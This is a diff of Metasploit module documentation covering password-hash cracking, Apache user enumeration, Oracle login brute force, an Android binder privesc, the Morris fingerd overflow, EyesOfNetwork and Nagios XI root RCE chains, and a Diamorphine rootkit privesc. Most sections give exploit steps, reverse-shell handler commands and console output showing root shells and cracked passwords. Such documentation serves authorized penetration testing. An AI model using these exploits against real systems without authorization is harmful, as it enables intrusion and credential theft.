-                       oracle11_epsilon   S:8F2D65FB5547B71C8DA3760F10960428CD307B1C6271691FC55C1F56554A;H:DC9894A01797D91D92ECA1DA66242209;T:23D1F8CAC9001F69630ED2DD8DF67DD3BE5C470B5EA97B622F757FE102D8BF14BEDC94A3CC046D10858D885DB656DC0CBF899A79CD8C76B788744844CADE54EEEB4FDEC478FB7C7CBFBBAC57BA3EF22C         Nonreplayable hash  raw-sha1,oracle
-                       oracle12c_epsilon  epsilon                                                                                                                                                                                                                                                                      Password            
-                       oracle12c_epsilon  H:DC9894A01797D91D92ECA1DA66242209;T:E3243B98974159CC24FD2C9A8B30BA62E0E83B6CA2FC7C55177C3A7F82602E3BDD17CEB9B9091CF9DAD672B8BE961A9EAC4D344BDBA878EDC5DCB5899F689EBD8DD1BE3F67BFF9813A464382381AB36B                                                                        Nonreplayable hash  pbkdf2,oracle12c
-
-```
@@ -1,131 +0,0 @@
-## Vulnerable Application
-
-  This module attempts to use [john the ripper](https://www.openwall.com/john/) to decode PostgreSQL
-  based password hashes, such as:
-
-  * `postgres` based passwords
-  * `raw-md5` based passwords
-
-  Sources of hashes can be found here:
-  [source](https://openwall.info/wiki/john/sample-hashes), [source2](http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats)
-
-  PostgreSQL is a `raw-md5` format with the username appended to the password.  This format was
-  added to JtR as `dynamic_1034` [here](https://github.com/magnumripper/JohnTheRipper/commit/e57d740bed5c4f4e40a0ff346bcdde270a8173e6)
-
-## Verification Steps
-
-  1. Have at least one user with an `postgres`, or `raw-md5` password in the database
-  2. Start msfconsole
-  3. Do: ```use auxiliary/analyze/jtr_postgres_fast```
-  4. Do: ```run```
-  5. You should hopefully crack a password.
-
-## Options
-
-
-   **CONFIG**
-
-   The path to a John config file (JtR option: `--config`).  Default is `metasploit-framework/data/john.conf`
-
-   **CUSTOM_WORDLIST**
-
-   The path to an optional custom wordlist.  This file is added to the new wordlist which may include the other
-   `USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.
-
-   **DeleteTempFiles**
-
-   This option will prevent deletion of the wordlist and file containing hashes.  This may be useful for
-   running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
-
-   **ITERATION_TIMEOUT**
-
-   The max-run-time for each iteration of cracking
-
-   **JOHN_PATH**
-
-   The absolute path to the John the Ripper executable.  Default behavior is to search `path` for
-   `john` and `john.exe`.
-
-   **KORELOGIC**
-
-   Apply the [KoreLogic rules](http://contest-2010.korelogic.com/rules.html) to Wordlist Mode (slower).
-   Default is `false`.
-
-   **MUTATE**
-
-   Apply common mutations to the Wordlist (SLOW).  Mutations are:
-
-   * `'@' => 'a'`
-   * `'0' => 'o'`
-   * `'3' => 'e'`
-   * `'$' => 's'`
-   * `'7' => 't'`
-   * `'1' => 'l'`
-   * `'5' => 's'`
-
-   Default is `false`.
-
-   **POT**
-
-   The path to a John POT file (JtR option: `--pot`) to use instead.  The `pot` file is the data file which
-   records cracked password hashes.  Kali linux's default location is `/root/.john/john.pot`.
-   Default is `~/.msf4/john.pot`.
-
-   **USE_CREDS**
-
-   Use existing credential data saved in the database.  Default is `true`.
-
-   **USE_DB_INFO**
-
-   Use looted database schema info to seed the wordlist.  This includes the Database Name, each Table Name,
-   and each Column Name.  If the DB is MSSQL, the Instance Name is also used.  Default is `true`.
-
-   **USE_DEFAULT_WORDLIST**
-
-   Use the default metasploit wordlist in `metasploit-framework/data/wordlists/password.lst`.  Default is
-   `true`.
-
-   **USE_HOSTNAMES**
-
-   Seed the wordlist with hostnames from the workspace.  Default is `true`.
-
-   **USE_ROOT_WORDS**
-
-   Use the Common Root Words Wordlist in `metasploit-framework/data/wordlists/common_roots.txt`.  Default
-   is true.
-
-## Scenarios
-
-Create hashes:
-
-```
-creds add user:example postgres:md5be86a79bf2043622d58d5453c47d4860
-```
-
-Crack them:
-
-```
-msf5 > use auxiliary/analyze/jtr_postgres_fast 
-msf5 auxiliary(analyze/jtr_postgres_fast) > run
-
-[*] Hashes written out to /tmp/hashes_tmp20190211-6421-1hooxft
-[*] Wordlist file written out to /tmp/jtrtmp20190211-6421-1hv6clq
-[*] Cracking dynamic_1034 hashes in normal wordlist mode...
-Using default input encoding: UTF-8
-[*] Cracking dynamic_1034 hashes in single mode...
-Using default input encoding: UTF-8
-[*] Cracking dynamic_1034 hashes in incremental mode (Digits)...
-Using default input encoding: UTF-8
-[*] Cracked passwords this run:
-[+] example:password
-[*] Auxiliary module execution completed
-msf5 auxiliary(analyze/jtr_postgres_fast) > creds
-Credentials
-===========
-
-host  origin  service  public   private                              realm  private_type  JtR Format
----  ------  -------  ------   -------                              -----  ------------  ----------
-                       example  md5be86a79bf2043622d58d5453c47d4860         Postgres md5  raw-md5,postgres
-                       example  password                                    Password      
-
-```
@@ -1,158 +0,0 @@
-## Vulnerable Application
-
-  This module attempts to use [john the ripper](https://www.openwall.com/john/) to decode Windows
-  based password hashes, such as:
-
-  * `LM`, or `LANMAN` based passwords
-  * `NT`, `NTLM`, or `NTLANMAN` based passwords
-
-  Sources of hashes can be found here:
-  [source](https://openwall.info/wiki/john/sample-hashes), [source2](http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats)
-
-## Verification Steps
-
-  1. Have at least one user with an `nt` or `lm` password in the database
-  2. Start msfconsole
-  3. Do: ```use auxiliary/analyze/jtr_windows_fast```
-  4. Do: ```run```
-  5. You should hopefully crack a password.
-
-## Options
-
-
-   **CONFIG**
-
-   The path to a John config file (JtR option: `--config`).  Default is `metasploit-framework/data/john.conf`
-
-   **CUSTOM_WORDLIST**
-
-   The path to an optional custom wordlist.  This file is added to the new wordlist which may include the other
-   `USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.
-
-   **DeleteTempFiles**
-
-   This option will prevent deletion of the wordlist and file containing hashes.  This may be useful for
-   running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
-
-   **ITERATION_TIMEOUT**
-
-   The max-run-time for each iteration of cracking
-
-   **JOHN_PATH**
-
-   The absolute path to the John the Ripper executable.  Default behavior is to search `path` for
-   `john` and `john.exe`.
-
-   **KORELOGIC**
-
-   Apply the [KoreLogic rules](http://contest-2010.korelogic.com/rules.html) to Wordlist Mode (slower).
-   Default is `false`.
-
-   **MUTATE**
-
-   Apply common mutations to the Wordlist (SLOW).  Mutations are:
-
-   * `'@' => 'a'`
-   * `'0' => 'o'`
-   * `'3' => 'e'`
-   * `'$' => 's'`
-   * `'7' => 't'`
-   * `'1' => 'l'`
-   * `'5' => 's'`
-
-   Default is `false`.
-
-   **POT**
-
-   The path to a John POT file (JtR option: `--pot`) to use instead.  The `pot` file is the data file which
-   records cracked password hashes.  Kali linux's default location is `/root/.john/john.pot`.
-   Default is `~/.msf4/john.pot`.
-
-   **USE_CREDS**
-
-   Use existing credential data saved in the database.  Default is `true`.
-
-   **USE_DB_INFO**
-
-   Use looted database schema info to seed the wordlist.  This includes the Database Name, each Table Name,
-   and each Column Name.  If the DB is MSSQL, the Instance Name is also used.  Default is `true`.
-
-   **USE_DEFAULT_WORDLIST**
-
-   Use the default metasploit wordlist in `metasploit-framework/data/wordlists/password.lst`.  Default is
-   `true`.
-
-   **USE_HOSTNAMES**
-
-   Seed the wordlist with hostnames from the workspace.  Default is `true`.
-
-   **USE_ROOT_WORDS**
-
-   Use the Common Root Words Wordlist in `metasploit-framework/data/wordlists/common_roots.txt`.  Default
-   is true.
-
-## Scenarios
-
-Create hashes:
-
-```
-creds add user:lm_password ntlm:E52CAC67419A9A224A3B108F3FA6CB6D:8846F7EAEE8FB117AD06BDD830B7586C jtr:lm
-creds add user:nt_password ntlm:AAD3B435B51404EEAAD3B435B51404EE:8846F7EAEE8FB117AD06BDD830B7586C jtr:nt
-```
-
-Crack them:
-
-```
-msf5 > use auxiliary/analyze/jtr_windows_fast 
-msf5 auxiliary(analyze/jtr_windows_fast) > run
-
-[*] Hashes Written out to /tmp/hashes_tmp20190211-6421-koittz
-[*] Wordlist file written out to /tmp/jtrtmp20190211-6421-1v82lkm
-[*] Cracking lm hashes in normal wordlist mode...
-Using default input encoding: UTF-8
-Using default target encoding: CP850
-Warning: poor OpenMP scalability for this hash type, consider --fork=8
-Will run 8 OpenMP threads
-Press 'q' or Ctrl-C to abort, almost any other key for status
-0g 0:00:00:00 DONE (2019-02-11 19:34) 0g/s 1177Kp/s 1177Kc/s 1177KC/s PLANO..VAGRANT
-Session completed
-[*] Cracking lm hashes in single mode...
-Using default input encoding: UTF-8
-Using default target encoding: CP850
-Warning: poor OpenMP scalability for this hash type, consider --fork=8
-Will run 8 OpenMP threads
-Press 'q' or Ctrl-C to abort, almost any other key for status
-0g 0:00:00:02 DONE (2019-02-11 19:34) 0g/s 4634Kp/s 4634Kc/s 4634KC/s WAC1907..E1900
-Session completed
-[*] Cracking lm hashes in incremental mode (Digits)...
-Using default input encoding: UTF-8
-Using default target encoding: CP850
-Warning: poor OpenMP scalability for this hash type, consider --fork=8
-Will run 8 OpenMP threads
-Press 'q' or Ctrl-C to abort, almost any other key for status
-0g 0:00:00:00 DONE (2019-02-11 19:34) 0g/s 41152Kp/s 41152Kc/s 41152KC/s 0766269..0769743
-Session completed
-[*] Cracked Passwords this run:
-[+] lm_password:password
-[*] Cracking nt hashes in normal wordlist mode...
-Using default input encoding: UTF-8
-[*] Cracking nt hashes in single mode...
-Using default input encoding: UTF-8
-[*] Cracking nt hashes in incremental mode (Digits)...
-Using default input encoding: UTF-8
-[*] Cracked Passwords this run:
-[+] lm_password:password
-[+] nt_password:password
-[*] Auxiliary module execution completed
-msf5 auxiliary(analyze/jtr_windows_fast) > creds
-Credentials
-===========
-
-host  origin  service  public       private                                                            realm  private_type  JtR Format
----  ------  -------  ------       -------                                                            -----  ------------  ----------
-                       lm_password  password                                                                  Password      
-                       lm_password  e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c         NTLM hash     nt,lm
-                       nt_password  password                                                                  Password      
-                       nt_password  aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c         NTLM hash     nt,lm
-
-```
@@ -1,6 +1,6 @@
 ## Vulnerable Application

-More information can be found on the [Rapid7 Blog](https://community.rapid7.com/community/metasploit/blog/2010/03/08/locate-and-exploit-the-energizer-trojan).
+More information can be found on the [Rapid7 Blog](https://blog.rapid7.com/2010/03/08/locate-and-exploit-the-energizer-trojan).
 Energizer's "DUO" USB Battery Charger included a backdoor which listens on port 7777.

 The software can be downloaded from the [Wayback Machine](http://web.archive.org/web/20080722134654/www.energizer.com/usbcharger/language/english/download.aspx).
@@ -0,0 +1,42 @@
+## Vulnerable Application
+
+This module determines if usernames are valid on a server running Apache with the `UserDir` directive enabled. 
+It takes advantage of Apache returning different error codes for usernames that do not exist and for usernames
+that exist but have no `public_html` directory.
+
+### Enabling  `UserDir` on Ubuntu 16.04 with Apache installed
+1. `sudo a2enmod userdir`
+2. `sudo service apache2 restart`
+
+## Verification Steps
+
+1. Do: ```use auxiliary/scanner/http/apache_userdir_enum```
+2. Do: ```set RHOSTS [IP]```
+3. Do: ```set RPORT [PORT]```
+4. Do: ```run```
+
+## Scenarios
+
+### Apache 2.4.18 on Ubuntu 16.04
+
+![apache_userdir_enum Demo](https://i.imgur.com/UZanfTI.gif)
+
+```
+msf5 > use auxiliary/scanner/http/apache_userdir_enum
+msf5 auxiliary(scanner/http/apache_userdir_enum) > set rhosts alderaan
+rhosts => alderaan
+msf5 auxiliary(scanner/http/apache_userdir_enum) > run
+
+[*] http://192.168.6.172/~ - Trying UserDir: ''
+[*] http://192.168.6.172/ - Apache UserDir: '' not found
+[*] http://192.168.6.172/~4Dgifts - Trying UserDir: '4Dgifts'
+[*] http://192.168.6.172/ - Apache UserDir: '4Dgifts' not found
+...
+[*] http://192.168.6.172/~zabbix - Trying UserDir: 'zabbix'
+[*] http://192.168.6.172/ - Apache UserDir: 'zabbix' not found
+[*] http://192.168.6.172/~vagrant - Trying UserDir: 'vagrant'
+[*] http://192.168.6.172/ - Apache UserDir: 'vagrant' not found
+[+] http://192.168.6.172/ - Users found: backup, bin, daemon, games, gnats, irc, list, lp, mail, man, messagebus, news, nobody, proxy, sshd, sync, sys, syslog, uucp
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
@@ -0,0 +1,104 @@
+## Vulnerable Application
+
+This module attempts to authenticate against an Oracle RDBMS instance using username and password
+combinations indicated by the USER_FILE, PASS_FILE, and USERPASS_FILE options. The default wordlist
+is [oracle_default_userpass.txt](https://github.com/rapid7/metasploit-framework/blob/master/data/wordlists/oracle_default_userpass.txt).
+
+Default port for SQL*Net listener is 1521/tcp. If this port is open, try this module to login.
+
+### Install
+
+This module needs nmap 5.50 or above to function.  However due to an [nmap bug](https://github.com/nmap/nmap/issues/1475) versions
+6.50-7.80 may not work.
+
+```
+nmap -V
+apt-get install nmap
+```
+
+In addition, if you encounter errors due to OCI libraries not being found, please see the
+[How to get Oracle Support working with Kali Linux](https://github.com/rapid7/metasploit-framework/wiki/How-to-get-Oracle-Support-working-with-Kali-Linux).
+
+For Oracle Server, please follow the following
+[guide](https://tutorialforlinux.com/2019/09/17/how-to-install-oracle-12c-r2-database-on-ubuntu-18-04-bionic-64-bit-easy-guide/).
+
+## Verification Steps
+
+  1. Install Oracle Database server and metasploit components
+  2. Start msfconsole
+  3. Do: ```use auxiliary/scanner/oracle/oracle_login```
+  4. Do: ```run```
+
+## Options
+
+  **BLANK_PASSWORDS**
+
+  Try blank passwords for all users
+
+  **BRUTEFORCE_SPEED**
+
+  How fast to bruteforce, scale of 0 to 5
+
+  **DB_ALL_CREDS**
+
+  Try each user/password couple stored in the current database
+
+  **DB_ALL_PASS**
+
+  Add all passwords in the current database to the list to try
+
+  **DB_ALL_USERS**
+
+  Add all users in the current database to the list to try
+
+  **NMAP_VERBOSE**
+
+  Display nmap output
+
+  **PASSWORD**
+
+  Specify one password to use for all usernames
+
+  **PASS_FILE**
+
+  File of passwords, one per line.
+
+  **RHOSTS**
+
+  Target hosts, range CIDR identifier, or hosts file with syntax 'file:<path>'
+
+  **RPORTS**
+
+  Ports of the target
+
+  **SID**
+
+  Instance (SID) to authenticate against. Default `XE`
+
+  **STOP_ON_SUCCESS**
+
+  Stop the bruteforce attack when a valid combination is found
+
+  **THREADS**
+
+  Number of concurrent threads (max of one per host)
+
+  **USERNAME**
+
+  Specific username to try for all passwords
+
+  **USERPASS_FILE**
+
+  File of username and passwords, separated by space, one set per line. Default `oracle_default_userpass.txt`
+
+  **USER_AS_PASS**
+
+  Try the username as the password for all users
+
+  **USER_FILE**
+
+  File containing usernames, one per line
+
+## Scenarios
+
+Unfortunately due to the nmap bug mentioned above, it was not possible to create an example run.
@@ -0,0 +1,40 @@
+## Vulnerable Application
+
+This exploit module currently targets a very specific build of Android on specific set of hardware targets:
+
+ - Google Pixel 2 or Pixel XL 2 phones running the September 2019 security patch level.
+
+This exploit module would have to be retargeted for any other potentially vulnerable build or hardware target.
+
+One difficult issue with the Google Pixel 2 is that, while many Google phones have an unlocked bootloader, making it easy to download older Android revisions, the latest Pixel 2 updates show this feature has been disabled or broken [older revisions to the device firmware](https://developers.google.com/android/images). This may be a firmware bug or intentional, but Google themselves do not appear to have an answer [for the problem](https://support.google.com/pixelphone/thread/14920605?hl=en). For testing, you may need a phone never updated to a later Android revision.
+
+## Verification Steps
+
+ - Get an android meterpreter session on a Pixel 2 or Pixel XL 2 with the right kernel:
+
+ `msfconsole -qx "use exploit/multi/handler; set payload android/meterpreter/reverse_tcp; set lhost $LHOST; set lport 4444; set ExitOnSession false; run -j`
+
+ - Currently this only works on the Pixel 2 (and Pixel 2 XL) with september 2019 Security patch level. Validate the kernel version looks like this:
+
+```
+uname -a
+Linux localhost 4.4.177-g83bee1dc48e8 #1 SMP PREEMPT Mon Jul 22 20:12:03 UTC 2019 aarch64
+```
+
+ - Run the exploit:
+
+```
+msf5 exploit(multi/handler) > use exploit/android/local/binder_uaf
+msf5 exploit(android/local/binder_uaf) > set LHOST IPADDR
+msf5 exploit(android/local/binder_uaf) > set LPORT 4448 (different from your Android meterpreter port)
+LPORT => 4448
+msf5 exploit(android/local/binder_uaf) > set SESSION -1
+SESSION => -1
+msf5 exploit(android/local/binder_uaf) > run
+```
+
+ - **Verify** the new session can read and write private application data (in /data/data/..../)
+
+## Scenarios
+
+This module illustrates a privesc that, when chained with other exploit vectors, could turn an unprivileged sandboxed exploit into a sandbox escape and system compromise. Note that the target application may need to match the kernel CPU type, so for instance a 64-bit Chrome would need to be targeted with a 64-bit kernel.
@@ -1,10 +1,13 @@
-## Introduction
+## Vulnerable Application
+
+### Description

 This module exploits a stack buffer overflow in `fingerd` on 4.3BSD.
+
 This vulnerability was exploited by the Morris worm in 1988-11-02.
 Cliff Stoll reports on the worm in the epilogue of *The Cuckoo's Egg*.

-## Setup
+### Setup

 A Docker environment for 4.3BSD on VAX is available at
 <https://github.com/wvu/ye-olde-bsd>.
@@ -14,7 +17,7 @@ For manual setup, please follow the Computer History Wiki's
 Garvin's [guide](http://plover.net/~agarvin/4.3bsd-on-simh.html) if
 you're using [Quasijarus](http://gunkies.org/wiki/4.3_BSD_Quasijarus).

-## Targets
+### Targets

 ```
 Id  Name
@@ -22,6 +25,10 @@ Id  Name
 0   @(#)fingerd.c   5.1 (Berkeley) 6/6/85
 ```

+## Verification Steps
+
+Follow [Setup](#setup) and [Scenarios](#scenarios).
+
 ## Options

 **RPORT**
@@ -31,46 +38,43 @@ port may be forwarded when NAT (SLiRP) is used in SIMH.

 **PAYLOAD**

-Set this to a BSD VAX payload. Currently only
+Set this to a BSD VAX payload. Currently, only
 `bsd/vax/shell_reverse_tcp` is supported.

-## Usage
+## Scenarios
+
+### `fingerd` 5.1 on 4.3BSD

 ```
-msf5 exploit(bsd/finger/morris_fingerd_bof) > options
+msf5 > use exploit/bsd/finger/morris_fingerd_bof
+msf5 exploit(bsd/finger/morris_fingerd_bof) > show missing

 Module options (exploit/bsd/finger/morris_fingerd_bof):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
-   RHOSTS  127.0.0.1        yes       The target address range or CIDR identifier
-   RPORT   79               yes       The target port (TCP)
+   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'


 Payload options (bsd/vax/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
-   LHOST  192.168.1.2      yes       The listen address (an interface may be specified)
-   LPORT  4444             yes       The listen port
-
-
-Exploit target:
-
-   Id  Name
-   --  ----
-   0   @(#)fingerd.c   5.1 (Berkeley) 6/6/85
-
+   LHOST                   yes       The listen address (an interface may be specified)

+msf5 exploit(bsd/finger/morris_fingerd_bof) > set rhosts 127.0.0.1
+rhosts => 127.0.0.1
+msf5 exploit(bsd/finger/morris_fingerd_bof) > set lhost 192.168.56.1
+lhost => 192.168.56.1
 msf5 exploit(bsd/finger/morris_fingerd_bof) > run

-[*] Started reverse TCP handler on 192.168.1.2:4444
+[*] Started reverse TCP handler on 192.168.56.1:4444
 [*] 127.0.0.1:79 - Connecting to fingerd
 [*] 127.0.0.1:79 - Sending 533-byte buffer
-[*] Command shell session 1 opened (192.168.1.2:4444 -> 192.168.1.2:51992) at 2018-09-25 10:14:15 -0500
+[*] Command shell session 1 opened (192.168.56.1:4444 -> 192.168.56.1:58015) at 2020-02-06 15:45:33 -0600

-whoami
-nobody
+who am i
+nobody   tty??   Feb  6 13:45
 cat /etc/motd
 4.3 BSD UNIX #1: Fri Jun  6 19:55:29 PDT 1986

@@ -0,0 +1,70 @@
+## Vulnerable Application
+This module exploits multiple vulnerabilities in EyesOfNetwork version 5.3 and prior in order to execute arbitrary commands as root.
+
+The module first exploits a hardcoded admin API key in EyesOfNetwork API version 2.4.2 (CVE-2020-8657) in order to generate a valid access token and use it to create a new user with admin privileges. If the generated key is not valid, the admin API key is obtained via an SQL injection vulnerability affecting the same API version (CVE-2020-8656).
+
+Next, the module authenticates as the newly created user in order to abuse a command injection vulnerability in the `target` parameter of the AutoDiscovery functionality within the EON web interface (CVE-2020-8654). Specifically, it writes an Nmap NSE script containing the payload to disk, and then activates this script by launching an Nmap host discovery scan against the target. This approach achieves privilege escalation because the default sudo configuration permits the 'apache' user to execute Nmap as root (CVE-2020-8655).
+
+The module only works with HTTPS, so SSL is enabled by default. Valid credentials for a user with administrative privileges are required. However, this module can bypass authentication via two methods, i.e. by generating an API access token based on a hardcoded key, and via SQLI. This module has been successfully tested on EyesOfNetwork 5.3 with API version 2.4.2.
+
+## Verification Steps
+1. Install the module as usual
+2. Start msfconsole
+3. Do: `use exploit/linux/http/eyesofnetwork_autodiscovery_rce`
+4. Do: `set RHOSTS [IP]`
+5. Do: `set payload [payload]`
+6. Do: `set LHOST [IP]`
+7. Do: `exploit`
+
+## Options
+1. `SERVER_ADDR`. This option should be set in case the EyesOfNetwork server IP address is different from RHOST. This because the EON server IP is needed to generate the API key.
+
+## Scenarios
+```
+msf5 exploit(linux/http/eyesofnetwork_autodiscovery_rce) > show options
+
+Module options (exploit/linux/http/eyesofnetwork_autodiscovery_rce):
+
+   Name         Current Setting  Required  Description
+   ----         ---------------  --------  -----------
+   Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS       192.168.1.1      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT        443              yes       The target port (TCP)
+   SERVER_ADDR                   yes       EyesOfNetwork server IP address (if different from RHOST)
+   SSL          true             no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI    /                yes       Base path to EyesOfNetwork
+   VHOST                         no        HTTP server virtual host
+
+
+Payload options (generic/shell_reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  192.168.1.2      yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Auto
+
+
+msf5 exploit(linux/http/eyesofnetwork_autodiscovery_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.1.2:4444 
+[*] Using generated API key: a496fb1025187066dc1e4e56197bd2db1a23c565f42b98df8ff55698442b6476
+[+] Authenticated as user kY7Qn1gr8L
+[*] Sending payload (428 bytes) ...
+[*] Command shell session 1 opened (192.168.1.2:4444 -> 192.168.1.1:45897) at 2020-02-19 15:30:31 +0100
+
+id
+uid=0(root) gid=0(root) groups=0(root)
+```
+## References
+1. <https://www.exploit-db.com/exploits/48025>
+2. <https://nvd.nist.gov/vuln/detail/CVE-2020-8654>
+3. <https://nvd.nist.gov/vuln/detail/CVE-2020-8655>
+4. <https://nvd.nist.gov/vuln/detail/CVE-2020-8656>
+5. <https://nvd.nist.gov/vuln/detail/CVE-2020-8657>
@@ -0,0 +1,96 @@
+## Introduction
+This module exploits a vulnerability in Nagios XI before 5.6.6 in order to execute arbitrary commands as root.
+
+The module first checks if the supplied credentials are valid and belong to a user with permissions to modify plugins. It then exploits these permissions by uploading a malicious plugin to the target and subsequently sending an HTTP GET request to profile.php?cmd=download. This request downloads a system profile from the server and in the process launches the getprofile.sh script as root via a passwordless sudo entry. This script executes the malicious plugin as root.
+
+For all supported targets except `Linux (cmd)`, the module uses a command stager to write the exploit to the target via the malicious plugin. However, this method may not work if Nagios XI is running in a restricted Unix environment like a minimal/custom CentOS installation. In the latter case, the target must be set to `Linux (cmd)`. For this target, the module writes the payload directly to the malicious plugin while avoiding commands that may not be supported in a restricted environment. It is recommended to use the target's default `cmd/unix/reverse_bash` payload in this scenario.
+
+If the target is found to be vulnerable but the module completes without establishing a session, try increasing the value of `WfsDelay` (the additional delay when waiting for a session). The default value of this advanced option is 10 seconds. To check it, run `show advanced`. Other possible solutions are changing the payload, manually setting the value of the `CMDSTAGER::FLAVOR` advanced option, and setting the target to `Linux (cmd)` as explained above.
+
+Valid credentials for a user with administrative privileges are required. This module was successfully tested on Nagios XI 5.6.5 running on CentOS 7. Please note that the module may behave differently when run against older versions of Nagios XI. For instance, during a test against Nagios XI 5.4.10, the module failed to trigger execution of the payload. Instead, the payload was executed randomly after a period of time (up to 5 minutes). Moreover, the session that was ultimately established, was not a root session.
+
+## Vulnerable system
+Nagios XI before 5.6.6.
+
+## Verification Steps
+1. Install the module as usual
+2. Start msfconsole
+3. Do: `use exploit/linux/http/nagiosxi_authenticated_rce`
+4. Do: `set RHOSTS [IP]`
+5. Do: `set SRVHOST [IP]`
+6. Do: `set USERNAME [username]`
+7. Do: `set PASSWORD [password]`
+8. Do: `set payload [payload]`
+9. Do: `set LHOST [IP]`
+10. Do: `set LPORT [port]`
+11. Do: `exploit`
+
+## Options
+1. `USERNAME`. The username to authenticate with. This user should have permissions to modify plugins. The default setting is `nagiosadmin`, which is the default admin account for Nagios XI systems.
+2. `PASSWORD`. The password to authenticate with.
+
+## Targets
+0. Linux (x86)
+1. Linux (x64) # This is the default target.
+2. Linux (cmd) # If wget is not installed on the target, this target should be selected together with the payload cmd/unix/reverse_bash.
+
+## Scenarios
+```
+msf5 exploit(linux/http/nagiosxi_authenticated_rce) > show options
+
+Module options (exploit/linux/http/nagiosxi_authenticated_rce):
+
+   Name       Current Setting       Required  Description
+   ----       ---------------       --------  -----------
+   PASSWORD   P@ssw0rd!             yes       Password to authenticate with
+   Proxies                          no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     192.168.1.1           yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT      80                    yes       The target port (TCP)
+   SRVHOST    192.168.1.2           yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
+   SRVPORT    8080                  yes       The local port to listen on.
+   SSL        false                 no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                          no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI  /                     yes       Base path to NagiosXI
+   URIPATH                          no        The URI to use for this exploit (default is random)
+   USERNAME   nagiosadmin           yes       Username to authenticate with
+   VHOST                            no        HTTP server virtual host
+
+
+Payload options (linux/x64/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  192.168.1.2      yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   1   Linux (x64)
+
+
+msf5 exploit(linux/http/nagiosxi_authenticated_rce) > run
+[*] Started reverse TCP handler on 192.168.1.2:4444 
+[*] Found Nagios XI application with version 5.6.5.
+[*] Using URL: http://192.168.1.2:8080/eFFP5lYvZ8eCnR0
+[*] Uploading malicious 'check_ping' plugin...
+[*] Command Stager progress - 100% done (121/121 bytes)
+[+] Successfully uploaded plugin.
+[*] Executing plugin...
+[*] Waiting for the plugin to request the final payload...
+[*] Client 192.168.1.1 (Wget/1.14 (linux-gnu)) requested /eFFP5lYvZ8eCnR0
+[*] Sending payload to 192.168.1.1 (Wget/1.14 (linux-gnu))
+[*] Sending stage (3021284 bytes) to 192.168.1.1
+[*] Meterpreter session 1 opened (192.168.1.2:4444 -> 192.168.1.1:56510) at 2020-02-27 16:27:49 +0100
+[*] Deleting malicious 'check_ping' plugin...
+[+] Plugin deleted.
+
+meterpreter > getuid
+Server username: uid=0, gid=0, euid=0, egid=0
+
+```
+## References
+1. <https://github.com/jakgibb/nagiosxi-root-rce-exploit>
+2. <https://nvd.nist.gov/vuln/detail/CVE-2019-15949>
@@ -0,0 +1,66 @@
+## Vulnerable Application
+
+  [Diamorphine](https://github.com/m0nad/Diamorphine) is a Linux Kernel Module (LKM) rootkit.
+
+  This module uses Diamorphine rootkit's privesc feature using signal
+  64 to elevate the privileges of arbitrary processes to UID 0 (root).
+
+  This module has been tested successfully with Diamorphine from `master`
+  branch (2019-10-04) on Linux Mint 19 kernel 4.15.0-20-generic (x64).
+
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. Get a session
+  3. `use exploit/linux/local/diamorphine_rootkit_signal_priv_esc`
+  4. `set SESSION [SESSION]`
+  5. `check`
+  6. `run`
+  7. You should get a new *root* session
+
+
+## Options
+
+  **SIGNAL**
+
+  Diamorphine elevate signal. (default: `64`)
+
+
+## Scenarios
+
+### Linux Mint 19 (x64)
+
+  ```
+  msf5 > use exploit/linux/local/diamorphine_rootkit_signal_priv_esc
+  msf5 exploit(linux/local/diamorphine_rootkit_signal_priv_esc) > set session 1
+  session => 1
+  msf5 exploit(linux/local/diamorphine_rootkit_signal_priv_esc) > set verbose true
+  verbose => true
+  msf5 exploit(linux/local/diamorphine_rootkit_signal_priv_esc) > check
+
+  [*] Executing id ...
+  uid=0(root) gid=0(root) groups=0(root),1001(test)
+  [+] The target is vulnerable. Diamorphine is installed and configured to handle signal '64'.
+  msf5 exploit(linux/local/diamorphine_rootkit_signal_priv_esc) > run
+
+  [*] Started reverse TCP handler on 172.16.191.165:4444 
+  [*] Executing id ...
+  uid=0(root) gid=0(root) groups=0(root),1001(test)
+  [*] Writing '/tmp/.hwL5UoDL6mfZ' (207 bytes) ...
+  [*] Executing /tmp/.hwL5UoDL6mfZ & echo  ...
+  [*] Transmitting intermediate stager...(106 bytes)
+  [*] Sending stage (985320 bytes) to 172.16.191.228
+  [*] Meterpreter session 2 opened (172.16.191.165:4444 -> 172.16.191.228:47694) at 2020-02-16 09:28:59 -0500
+
+  meterpreter > getuid
+  Server username: uid=0, gid=0, euid=0, egid=0
+  meterpreter > sysinfo
+  Computer     : 172.16.191.228
+  OS           : LinuxMint 19 (Linux 4.15.0-20-generic)
+  Architecture : x64
+  BuildTuple   : i486-linux-musl
+  Meterpreter  : x86/linux
+  meterpreter >
+  ```
+
@@ -2,7 +2,7 @@

